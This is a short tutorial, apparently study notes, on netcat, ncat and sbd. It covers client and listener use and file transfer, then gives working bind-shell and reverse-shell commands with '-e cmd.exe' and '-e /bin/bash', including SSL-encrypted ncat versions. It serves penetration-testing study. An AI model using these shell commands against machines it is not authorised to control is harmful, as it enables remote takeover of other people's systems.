Netcat is a tool that reads or writes to/from TCP and UDP network sockets. It can act as a client or server or scanner.
The simplest possible use is:
As a network client
nc 10.0.0.1 25 – netcat will attempt to connect (as a client by default) to port 25 (using TCP by default) on that IP address. It accepts a number of options:
-v = verbose – give more information
-vv = very verbose
-n = no DNS lookup
As a listener
nc -nlvp 5555 – will bind to local port 5555 and listen for incoming connections
-l = listen mode
-p = port number
You can then use another instance of netcat on another machine, as a client to connect to 5555 on their listener’s IP and the two netcats will talk to each other. Any text typed will be sent to the other client or listener. You could use this as a basic chat system.
To Transfer Files
On the receiving machine set up a listener outputting to a file:
nc -nlvp 5555 > filename.exe
On the sending machine set up a client accepting input from the file to be transferred:
nc -nv 10.0.0.1 5555 < /usr/share/filename.exe
Machine 1 is a linux box behind a NAT firewall. Machine 2 is a Win7 box, directly accessible on the network with no NAT.
To remotely control Machine 2 we can set up a listener on it and connect from Machine 1:
Machine 2: nc -nlvp 5555 -e cmd.exe (listener – to be controlled)
-e = execute using this program, forwarding STDIN and STDOUT to the bound port on the network
Machine 1 (behind NAT): nc 10.0.0.1 5555 (client – taking control)
On connection Machine 1 will display the command prompt from Machine 2 as cmd.exe is now bound to port 5555.
When the machine to be controlled is behind a firewall restricting incoming traffic.
To remotely control Machine 1, we cannot simply reverse the nc commands because it’s behind a NAT firewall and so listening on port 5555 is pointless as, unless that port has been forwarded, no traffic will get through. So Machine 1 must still use a netcat client and Machine 2 must send its shell to Machine 1.
Machine 2: nc -nlvp 5555 (listener – taking control)
Machine 1: nc -nv 10.0.0.1 5555 -e /bin/bash (client – to be controlled)
Note here the -e shell option is running on the client end and is being sent to the listening machine
The easy way to remember is:
The -e shell option can be on a netcat listener or client
Listener goes on the non NAT machine
The -e shell option goes on the machine to be controlled
ncat is a more fully featured version of netcat and can overcome some of the limitations of netcat, including creating encrypted connections and limiting connection to those from certain IPs.
Secure Bind Shell
ncat -lvp 5555 -e cmd.exe –allow 10.0.0.9 –ssl (listener)
ncat -v 10.0.0.1 5555 –ssl (client)
Secure Revese Shell
ncat -lvp 5555 –allow 10.0.0.9 –ssl (listener/server)
ncat -v 10.0.0.1 5555 -e /bin/bash –ssl (client)
sbd stands for Secure Back Door and is another netcat like tool. It has features like ssl encryption, restricted access, shared keys etc